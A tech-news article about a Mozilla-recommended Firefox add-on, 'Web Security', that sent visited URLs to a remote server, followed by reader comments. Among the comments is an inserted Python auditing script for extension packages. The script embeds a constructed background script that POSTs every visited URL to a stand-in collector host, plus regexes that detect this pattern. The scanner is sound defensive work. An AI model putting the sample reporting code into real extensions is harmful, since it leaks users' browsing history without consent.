Mozilla recommended privacy extension had "phone-home" feature
A browser extension for the Firefox web browser that Mozilla recommended on its official Firefox blog as one of the extensions that make the "Firefox browser a privacy superpower" had phone-home functionality baked in: on every website load it submitted the current URL and previously visited URLs to a server in Germany.
Web Security, the name of the add-on, claims to protect users actively "from malware, tampered websites or phishing sites". The extension has more than 223,000 users according to Mozilla AMO and a rating of 3.7 out of 5.
Mozilla wrote on the official site:
Web Security is a sophisticated browser add-on that uses an extensive database to prevent websites from harming your computer or obtaining your sensitive data. Users are often lured to open counterfeit websites of banks by convincing emails. The Web Security extension will help you detect these counterfeit sites so that you will not be decoyed to enter your sensitive information where it is not safe.
The organization removed the recommendation from the official blog post after allegations were made that the extension transmitted data to a server in Germany on every connection.
Mike Kuketz published an analysis on his German blog. The extension Web Security transmits encrypted information over an insecure connection whenever a domain is visited in the browser.
A quick check with the network analyzer Wireshark confirmed the finding. Web Security communicates with a server IP address whenever a new page is loaded in any Firefox browser that has the extension installed.
The data is encrypted; interested users who extract the extension will find the function in include/background.js and see that it submits visited URLs to the server.
When the user opens pages while using Web Security, the following information is processed to ensure its successful operation: the web pages the user opens or the web server operating them, the name of the user's internet service provider, the website from which the user came, and the sub-pages the user opened.
The main issue for Firefox users is not that a privacy extension submits information to a server on every visit; that is bad but it has happened in the past and it will continue to happen as extensions are not reviewed manually anymore before they are published on AMO.
The main issue is that Mozilla recommended the extension on the official company blog as a privacy enhancing extension. The article still states that the collection includes 14 privacy extensions while only 13 are listed due to the removal of Web Security from the listing.
When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.
The blog post has no author attached to it, so it is unclear who published the recommendations.
Now You: What is your take?
Well dat smells stinkowiff!
So Mozilla went from reviewing every extension to recommending extensions without even understanding what they are really doing under the hood.
Sounds like something Google would do.
@Chris: would do? Has done, both on the Chrome Web Store and Google Play ;-)
Now you know why manual addon code review is gone. Because all the capable people of doing it also left Mozilla.
>Firefox browser a privacy superpower
It’s a bit of a bold claim coming from a company whose browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where.
True, but all other browsers don’t even have those settings and are linked to companies who are more “dangerous” because they are bigger and know more about you already before you use their browser.
Not all other browsers, Waterfox is an ethical fork of Firefox that has most of the spying removed out of the box, plus other user-hostile Mozilla changes reversed.
I for one realize that excessive exaggeration is a thing now when trying to make a point. I plead guilty as should many others!
Waterfox can be a good choice for some people but like all other browsers it has areas that can be improved on and its use comes at a price. And, misbehaving extensions will still misbehave when using Waterfox.
“plus other user-hostile Mozilla changes reversed” Hostile? (relating to, or characteristic of an enemy: antagonistic) What changes has Waterfox made that reverses Mozilla “hostility” directed at its users? Just curious.
As far as studies and experiments go I have a Test profile with the boxes available in the Privacy Settings page unchecked and I am yet to see anything added to the browser that I don’t want. And I left about:config unmolested other than a few security settings.
“browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where” Hundreds? Obscure? How dare you? LoL
There are changes that can be made, that are easily accessible in the Settings, that will have a big impact on data shared by the browser. And for those that want to clamp down on data even further there are a dozen or two settings in about:config for prefetch, predictor, referers, speculative parallel limit, beacon.enabled, webrtc and a few others. Most of which by the way are at the exact same default settings in Waterfox.
If you’re referring to the very thorough ghacks.user.js with “hundreds” of settings, they are to some degree, in my opinion, redundant, repetitious, let’s be absolutely sure, just in case, because we can. Removing IDs and URLs for example is just a fail-safe in case some bug rears its ugly head because some people want to remove any possibility, no matter how remote the possibility is, of an unwanted connection being made, just in case, because we can. And that’s fine. To some degree I also do the just in case because I can in about:config. If all the changes are really needed is debatable. Even then I’m not seeing hundreds of “privacy” specific settings.
I will always agree that some about:config settings should be on a Settings page. Like mousewheel acceleration start and factor and smoothscroll duration, because not changing those in FF just freaks me the eff out. ;) Then there are referer settings and some others that should be on a Settings page. At least they’re available.
Richard, my config file has over 450 entries (it’s 486 lines, but not all are config entries). I think it’s safe to say hundreds of obscure settings have been toggled to make what I would deem as a usable browser. And with every Firefox update I have to dig in to find out what other nonsense Mozilla has slipped in which I might want to disable. It’s a constant battle of Mozilla adding more crap to this browser and me removing/disabling it, one battle of which I’m really getting tired and seriously consider alternatives. At this point the bookmarks manager is the only thing keeping me on Firefox.
For the record, the current ghacks user.js (excluding the deprecated section and parrots) has 326 active prefs. Some are enforcing defaults (some of these it depends on your FF version, branch). Some are redundant (but not many, and always included for good reason – some were there *before* they were at current default, eg SSL 1.3 for example – some are for future proofing and yes it’s happened before!, and we’re spanning whole ESR cycles for good measure). Some are included to make sections “complete” for full knowledge. It’s meant to be comprehensive for a reason.
> browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where
I agree with Richard. Most telemetry can be disabled directly in the UI with a couple of clicks. And only a few other prefs need attention to fully close that down. i.e to do directly with telemetry. Mozilla are entitled to that. If you don’t trust them (and I do when they say it’s not collecting ID’ing info and it’s de-anonymized etc – exclude the odd mistake with shield studies), then go use a different browser. Oh wait, they gave you the ability to actually turn it off.
However, yes, there are hundreds of settings which can really tighten things up. Besides telemetry, there is real-time safe-browsing binary checks. And as Richard mentioned, things like prefetching. But ALL major browsers have that as a default, except niche ones like Waterfox. All Waterfox is in this regard (i.e about settings, not XUL) is a SLIGHTLY tweaked firefox (maybe a couple of patches, not really interested).
A major browser needs to work with all open standards and not break things. So of course a FF out of the box will have a swag of privacy implications:
– prefetch for speed: they need to compete with end user’s expectations
– Safe Browsing using google’s info (which is not a privacy concern, except the real time binary checks, but people think it is)
– and we could go on.
The difference is that people *choose* to specifically get Waterfox because it has these things turned off or whatever. If Firefox did that by default, no-one in essence would use it, because everything breaks, or major articles would appear – Firefox doesn’t protect you from known malicious websites like chrome does, etc. At the end of the day, they need numbers, and that is only a good thing for diversity in the browser space.
At least they provide thousands of settings under the hood. At last count I think total prefs in FF62 numbered 3.5K (excluding maybe some hidden ones, and system addon ones only in the system addon xpi’s)
In my “Test” profile I have 312 actual about:config (user_pref) entries. I’ve intentionally made as few changes in about:config as I can and tried first to make most of my changes from the Settings pages. I have offline website data, cookies and site data cleared at the end of each browser session, 3rd party cookies are not allowed and telemetry, studies and crash reports are disabled, tracking protection is enabled. As small as my config file is I still changed from within about:config: beacon.enabled, cache sizes, dom settings, geo, prefetch, smoothscroll, mousewheel acceleration, network settings, referers and cipher suites used. Sounds like a lot but my 312 about:config entries shows otherwise. The profile works very well using only four extensions and, I feel good about the security and privacy configuration as it is. I would be fine using this profile as my default if I added some extensions from the “default” profile.
My “default” profile has 540 about:config entries, not lines but actual entries. The default profile has 13 extensions installed and actually outperforms my six other browser installs, including Nightly. I think Nightly, because of its twice daily updates, has great days, good days and…some not so good days. :)
Wasn’t the same (i.e. transmitting data) also true for Firefox Focus, a browser published by Mozilla that was (is!) intended to enhance privacy?
Yeah, they send it to Adjust GmbH. Privacy focused browser my a$$.
Of course it’s more evidence you can’t trust any extensions added to your web browser – regardless of the source. Google Web Store is guilty of far more egregious behavior and lowered standards to such a low level there aren’t anymore. Computer software tested to be as advertised and safe today may not be tomorrow and most certainly will not be on third party sites.
But you are only scratching the surface if you limit your inquiry to the above. Microsoft purchased Git-Hub recently and what kind of assurance do you think we could expect from Microsoft regarding software integrity at Git-Hub? Answer: None. Same answer for anyone else.
The concept of “access” will likely be redefined and see internet being broken up into separate and distinct tiers, most of which won’t be open to the general public. Because like an individual waving a hundred dollar bill around in the middle of the night shouting “Wow, look at what I’ve found.” is going to get mugged. Most of us don’t want to associate with or be around that kind of stupidity.
Ouch, I wasn’t aware that M$ had acquired Github, and for a pretty hefty price tag at US$7.5 billion as well.
I see the sparks are flying already too: https://github.com/selfagency/microsoft-drop-ice
Hopefully that is just a few DUMBSHITS on github. Ice protects USA from terrorists and despite msm lies they are not racist, many are Hispanic. Fucking Idiots!
That’s incredibly stupid! Beyond naive, well into ignorant. We have a culture of mushroom people who seriously need to put away their electronic junk and go outside. Yeah, the pics are sad but as long as we’re eliminating ICE, let’s disband the military, no one ever invades US. DUUUUHHHH!!!!!
You can only bite the hand that feeds you so many times.
I don’t think the folks at Github are advocating disbanding ICE, just Microsoft’s association with them.
And let’s not forget that it’s been ICE which has been responsible for immigrant families from war torn countries seeking safe haven in the US for separating children from their parents so that the adults can be sent to jail.
As for Microsoft, they’ve never been a friend of open source software, with the then CEO Steve Ballmer describing Linux as a cancer back in 2001. So OS developers are fully justified in being suspicious of Microsoft’s intentions with their acquisition of Github.
I had heard about the ‘U.S. Immigration and Customs Enforcement’ (https://en.wikipedia.org/wiki/U.S._Immigration_and_Customs_Enforcement) but ignored its ICE abbreviation.
“When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.”
Because Mozilla has not yet implemented a robot for that, be patient.
The IP in the screenshot 184.108.40.206 is registered to Synatix GmbH. According to Symantec there’s an Adware called Peppi published by them: https://www.symantec.com/security-center/writeup/2008-061318-4755-99
Martin, I can’t seem to find any reference to Web Security on that Mozilla blog that you linked in your article. Did they change the content after the news about this extension came out (or after your article)?
They removed the quoted part from the blog post but before I published this article.
Virtually everyone is doing the same, whether it’s Google, MS, or your favorite browser and it doesn’t matter whether you pay for services or not or what settings you use.
Your data and history is out there.
To be honest, the quality of Mozilla extensions has dropped drastically; nonsense and useless/less useful extensions are released every day, and the quality is not even as good as a userscript/userstyle…
Well, that is sad; I’d rather want high quality extensions like Greasemonkey, Custom Button, uBlock rather than those…
A loss of quality for the sake of speed? I do agree with that, observable everywhere by the way except, maybe, in the luxury area.
It’s not new at all that Mozilla rapes our privacy all the time while pretending to defend it for the gullible, this has been going on for years and accelerating like crazy during the last year, there is just lots of inertia to fight before the majority of users integrate this fact and switches to a sane fork.
Never trust an extension just because it’s recommended by Mozilla. They recommend the infamous Ghostery too.
Never trust any large corporation or organization. The same can also apply to small ones. Popularity guarantees nothing, look how many people use compromised products or accept monopolistic services who extort them with phony “fees” and “surcharges” like the telecoms do. People blindly submit to authority. They are as submissive to these corporations as they are to a government.
Mozilla not only allowing but more over recommending an infected extension is relevant of modern times’ productivism all based on more at lesser cost and leads to a continuous and increasing falling of reliability, be it in software security/privacy, agriculture and food quality, transports, constructions and you name it. Fifty years’ old bridges collapse when centuries’ old constructions are still standing.
There is definitely a problem all about quantity, speed, pace. Quality is too expensive nowadays and has entered the topic of luxury. The ‘Kleenex’ era is here, cheap, use & forget, buy again. Mad.
But when it comes to a company advertising its commitment to users’ privacy my opinion is not that this company is lying but that it is not giving itself the means of its ambition and promises. It is undoubtedly failing, but not sunk. I won’t force it to drown, but I certainly hope mistakes as this one will wake up some brilliant minds and recall them that repeated failures are quickly interpreted as a crappy if not lying communication strategy.
Regarding my practice with new extensions, my policy is to download it first, unzip it, check the files for ‘http’ occurrences and where they point to, in the same way that, as a pedestrian, I don’t rely on traffic signals but on the reality of the road: cars or not? Products’ traffic signals nowadays have become unreliable, don’t count on them, check for yourself. Cheaper than before except that you have to do yourself what was previously included in the price. Definitely an amazing proportion of Bozos in the business arena, which is a pity because a good and reliable product is the best possible advertisement.
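As an added example (not code from the article, from this commenter, or from the Web Security extension), the script below does the check this comment describes and the article's own hint about include/background.js: unpack an .xpi (a plain zip), list every URL literal with its host, flag plain-http endpoints, and flag files that pair a navigation hook with a network API. It builds a constructed sample package in memory so it runs offline; the hostname, file names and function names are assumptions. A literal scan misses endpoints that are assembled at runtime or obfuscated, so pair it with a network capture as the article did with Wireshark.

```python
"""Offline audit of a Firefox extension package (.xpi is a plain zip).

Added example for this article; not ghacks' code and not the Web Security
extension's code. The sample extension below is constructed to mimic the
behaviour the post describes (POST the visited URL to a remote host on every
navigation) so the scanner has something to find. Hostnames, file names
and function names are assumptions, not taken from any real add-on.
"""
import io
import json
import re
import sys
import zipfile
from urllib.parse import urlparse

# --- constructed sample package (stands in for a downloaded .xpi) -----------
SAMPLE_MANIFEST = {
    "manifest_version": 2,
    "name": "Constructed Shield",
    "version": "1.0",
    "permissions": ["tabs", "webNavigation", "<all_urls>"],
    "background": {"scripts": ["include/background.js"]},
}
SAMPLE_BACKGROUND_JS = r"""
// constructed: report every completed navigation to a collector over plain http
browser.webNavigation.onCompleted.addListener(function (details) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://collector.example.invalid/check.php");
  xhr.send("url=" + encodeURIComponent(details.url));
});
"""

def build_sample_xpi() -> bytes:
    """Zip the constructed manifest and background script into an in-memory .xpi."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(SAMPLE_MANIFEST))
        z.writestr("include/background.js", SAMPLE_BACKGROUND_JS)
    return buf.getvalue()

# --- scanner ----------------------------------------------------------------
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# APIs that let a script learn which pages the user visits ...
NAV_API_RE = re.compile(r"\b(webNavigation\.on\w+|tabs\.onUpdated|webRequest\.on\w+)\b")
# ... and APIs that let it send data out.
NET_API_RE = re.compile(r"\b(XMLHttpRequest|fetch|sendBeacon|WebSocket)\b")

def audit_xpi(data: bytes) -> dict:
    """Return declared permissions, every URL literal with its file and host,
    plain-http URLs, and files that pair a navigation hook with a network API."""
    report = {"permissions": [], "urls": [], "plain_http": [], "reporting_files": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "manifest.json" in names:
            manifest = json.loads(z.read("manifest.json"))
            report["permissions"] = list(manifest.get("permissions", []))
        for name in names:
            if not name.endswith((".js", ".json", ".html")):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            for url in URL_RE.findall(text):
                report["urls"].append((name, urlparse(url).netloc, url))
                if url.startswith("http://"):
                    report["plain_http"].append((name, url))
            if NAV_API_RE.search(text) and NET_API_RE.search(text):
                report["reporting_files"].append(name)
    return report

def is_suspicious(report: dict) -> bool:
    """Heuristic: page-visit access plus code that both watches navigation
    and talks to the network is the pattern described in the post."""
    broad = any(p in ("tabs", "webNavigation", "<all_urls>") for p in report["permissions"])
    return broad and bool(report["reporting_files"])

if __name__ == "__main__":
    # Pass a downloaded .xpi path to audit it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xpi()
    result = audit_xpi(data)
    print("permissions:", result["permissions"])
    for name, host, url in result["urls"]:
        print(f"{name}: {host}  ({url})")
    print("plain-http endpoints:", len(result["plain_http"]))
    print("navigation+network files:", result["reporting_files"])
    print("suspicious:", is_suspicious(result))
```

The "navigation hook plus network API in the same file" heuristic is deliberately coarse: a legitimate safe-browsing add-on may match it too, so treat a hit as a reason to read that file and watch the traffic, not as a verdict.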
These problems are more due to profit-driven production than to productivity itself.
The day productivity will be defined as a rate including quality I’ll consider profit-driven production as an exception.
When I was a kid studying in the United Nations International School (UNIS) in N.Y., our French teacher from the ‘Alliance Française’ told us this story I never forgot, which describes the paradox of productivity in terms of happiness and which is understandable even for non-lefties as we were and remain: she had traveled to Mexico and found a gorgeous sombrero. She asked the craftsman if he’d make her a price if she bought several of the same sombrero, to which the old man answered “I make you a price if you ask me for several different sombreros, but it’ll be more expensive if you want them all the same, because repeating is bothering when creating is not”.
So let’s forget demagogy, so relative. I’d be a democrat in the USA but certainly not a ‘Socialist’ in France. When we returned to Europe, then to France, I discovered that the left-wingers would consider anyone not sitting, speaking and acting as a leftist to be a rightist, so I guess we were rightists: what the heck? Free, open-minded, committed to individuals rather than to sociology and at the same time adversary to any system based on slavery. Took me decades to start wondering if this approach based on education is still valid when I observe what this free entrepreneurial and market system is leading to. No demagogy and still not on the far left but I admit I’m slowly starting to wonder if I’m not deeply mistaken. Sorry for this very personal slip into out-of-context thoughts, I only meant to make my case clear.
It all sounds like you are becoming an old man surfing on personal memories that continue to have less relevance for today’s life. I may have the very same problem however I do my best not to advertise in a manner as you do.
@jan, I have to agree with you concerning that very comment of mine you are referring to. But if I happen to digress it’s never in such a confidential way. I guess i slipped that day. This said, in another context, one not committed to technology I’m not sure the past, be it ours, “continues to have less relevance”. That’s another debate and this is not the place for it, as well.
Tom, rushed, half-assed products are de rigueur today because there are markets for them. When customers demand good products, and I’m not sure there are many customers, especially younger ones, who know what good design and execution are, supply will shift to meet demand. A lot of junk producers will evaporate, a good thing.
Not getting down on kiddies but growing up staring at phones playing the latest vid of some idiot screaming while conversing with “friends” at machine gun speed so they don’t miss the next dopamine rush leaves little time for creativity and reflection. Twenty pairs of ear buds to find some that don’t sound like crap? Then buy 20 more pairs. There’s your market.
It’s not a supply problem, it’s demand.
This is a supply problem (maybe you’ve seen these pics):
Of course there is demand for privacy-respecting software.
But profit controls the supply.
And it’s more profitable that this demand is not satisfied.
Has anyone ever done some objective research into recent Chrome versions, to look into whether the browser really phones home/mines data after you’ve disabled the usage stats option? I know people keep repeating this ad nauseam, but is this actually true? My company, a multinational consultancy, allows an extension-free Chrome (with some basic settings locked down) on its standard builds while Firefox is prohibited. Why would that be?
“My company, a multinational consultancy, allows an extension-free Chrome (with some basic settings locked down) on its standard builds while Firefox is prohibited. Why would that be?”
Who knows? There’s certainly no security reason for it. I can’t speak to Chrome’s behavior, but Firefox certainly does not phone home once you’ve disabled that stuff, so if your company policy is due to security, it’s inexplicable why they’d be OK with Chrome and not with Firefox.
My criticism of Firefox in terms of privacy (and I think it’s a serious criticism) is that it’s not as easy to lock it down as it should be. However, you absolutely can lock it down, and doing so isn’t *that* big of a deal.
Not only ‘Web Security’, also
Browser Privacy https://addons.mozilla.org/firefox/addon/browser-privacy/
Browser Safety https://addons.mozilla.org/firefox/addon/browser-safety/
Web Security, Browser-Security and Browser Privacy send every page visit to 220.127.116.11
Browser Safety sends every page visit to https://api.browser-safety.org/
See my (тбдщ) comment under this post https://adguard.com/en/blog/big-star-labs-spyware/
By the way, I wrote a negative review on the ‘Web Security’ extension page some time ago (about fake reviews and similar extensions), but it disappeared. If you look at the rating of the extension, you will see that it counts 64 reviews, but now only 16 are displayed.
‘Popup Blocker’ addon also sends every page visit to 18.104.22.168
Addons offered at yttools.io , fbtools.io and dirtylittlehelpers.com under suspicion:
See domain connection graphs:
More addons from smarttube.io https://addons.mozilla.org/firefox/user/CSS-IO/
They all have similar code in ‘background.js’ file.
See reverse IP lookup https://viewdns.info/reverseip/?host=web-security.com&t=1
All these add-ons are now blocklisted.
Do you have an excerpt of the malicious JS code that is common in all those addons? I would try to search for the same code in my other extensions, even in Chromium, to be sure 🤔
Today’s Internet is a JANUSHEAD, sees in two Directions, collect and hide.
So where is the problem, choose wisely and get to know, what to do to protect.
Nothing more, nothing less, eh?
P.S.: what is a JANUSHEAD? Look here:
There you see what it means,…^^
“…The date and duration of the individual page visits will be stored by Creative Software Solutions GmbH in an anonymous form and checked against a database operated by Creative Software Solutions GmbH to alert the user about malicious sites…”
How can any user trust a for-profit corporation like Mozilla to care about their privacy?
The question is whether they knew about this or not. Years ago I would have never posed such a question, but with Mozilla’s behavior over the past two years, who is to say one way or the other.
I think if the Mozilla team recommends “anything” then they should integrate the extension into the browser itself. I won’t trust by myself any “non-merged” extension. I use Firefox for a few things and I don’t want those few things to become compromised by external extensions. :S
I understand what you mean but the fact is that if Firefox had to integrate all Mozilla recommended extensions the browser would be over-bloated, not to mention that if a user takes into consideration (IF!) Mozilla’s recommendations doesn’t mean the extension itself interests him. Personally I care no more of Mozilla’s recommendations than I do of arts and movie critics or as the Chef’s suggestion in restaurants.
How many layers of redundant phishing/malware/altered site protection does one need? These are already in FF and your AV, maybe your router, too. I guess one could disable each layer until one’s satisfied their add-on has a clean slate from which to block, but maintaining databases is in no way fun. Why even bother with add-ons like the one mentioned? A year ago, I turned off all additional protection layers for just FF; the number of blocked pages is no different (almost none) and browsing is much faster. FF was doing all the blocking before, the others never caught anything. I do keep my blocked hosts file up to date; it blocks a site occasionally.
Yeah FF uses google but third parties use similar databases, for privacy a true VPN and/or Tor work well.
Privacy superpower? Privacy is a distinct category, not a catch-all for the three malicious intent nasties mentioned. If Web Security transferred your IP, you’ve lost a huge chunk of privacy; phoning home is just icing on the poop cake. I’d read Mozilla’s hype and move on; it doesn’t make any sense. Mozilla is silent on using all 13 (now) of the extensions mentioned together, which some users probably will. A good insomnia cure, that would be! I see one that’s sort of useful, Bloody Vikings, but even Privacy Badger gets slow as it builds its humongous site database.
Any add on or program one installs should be monitored for weird connections to be blocked; dump the add on if it’s obstinate. Seems like mozilla’s trying to resist but caving faster and faster to data collection revenue. They’re not watching the shop very well; it’s more and more up to users to understand how their browsers work.
That’s why I love ghacks, thank you, specially for this kind of articles. keep it up!
Here’s another suspicious one, still up on the Firefox Add-ons site:
I almost installed that developer’s “Download Manager (S3)” a few days ago, as it appeared to be by far the best substitute for the venerable, pre-WebExtensions Download Status Bar. But all these recent revelations about dodgy extensions have made me far more cautious. Mozilla’s evidently asleep at the wheel – it’s like “we’ve improved the security skeleton – you deal with the meat.”
Yes, about the developer of the S3 extensions I already warned people on the Pale Moon forum a long time ago. These extensions were on the Pale Moon add-ons web page and nothing was done. Then suddenly, recently, after this discovery had grown, all S3 extensions were removed from the PM add-ons page. And, like with Mozilla, no update from the PM team to inform users about the removal and why.
I’ve been avoiding all Firefox extensions developed by ‘Oleksandr’ (https://addons.mozilla.org/en-US/firefox/user/senselius/) ever since I noticed in his ‘ScreenGrab!’ pre-Quantum add-on a call to s3blog.org, confirmed with his FF57+ extensions. It’s been noted by some users on AMO but the show goes on. The add-ons (pre-Quantum) had the option to block these calls, which vanished with his Quantum extensions. Confirmed with another of his extensions, ‘Worldwide Radio’, where s3blog.org is called for the display of the radios’ logos (or the country’s flag, don’t remember) when these could easily be included in the extension. I haven’t tested all of his extensions but two (plus a third one, add-on only, never ported to a WebExtension) is enough for me to avoid all the extensions of this developer.
It’s apparent you can’t rely on Mozilla to respond proactively even when specific concerns are raised. A motivated external expert must take it upon themselves to fully investigate, document, and make the news. Even if that happens, seems all you can expect is for them to meekly remove the add-on and not inform those affected.
They can be dismissive of mere tip-offs:
The attitude in that example is like “thanks, but maybe that’s in the past and perhaps the developer’s cleaned up their act – you look into it further then send us a report”.
Which means 75,459 users are left unaware one of their add-ons may without their consent be reporting every domain they visit to the add-on developer and to a suspicious ad network.
Do you recall what Worldwide Radio sends exactly? I note it was one of the three winners of Mozilla’s Firefox Quantum Extensions Challenge:
chip.de has blocked Web Security für Firefox from downloading after a forum thread there explaining the problems: https://www.chip.de/downloads/Web-Security-fuer-Firefox_146506999.html
That’s obviously more than Mozilla is willing to do to get rid of these “man-in-the-middle-attack” extensions. Well done, CHIP! :)
Chip.de malicious installers
Blocked by uBlock Origin current badware risks list
That site doesn’t seem like a trust reference…
Moz. is way beyond the date “best before …” It is a walking wounded and it is only a matter of time. It seems there is no stopping of its blunders.
Official Statement anyone?
I have concluded that Mozilla doesn’t care about privacy anymore.
Funny how your browsing history is not personally identifiable information. Loopholes man.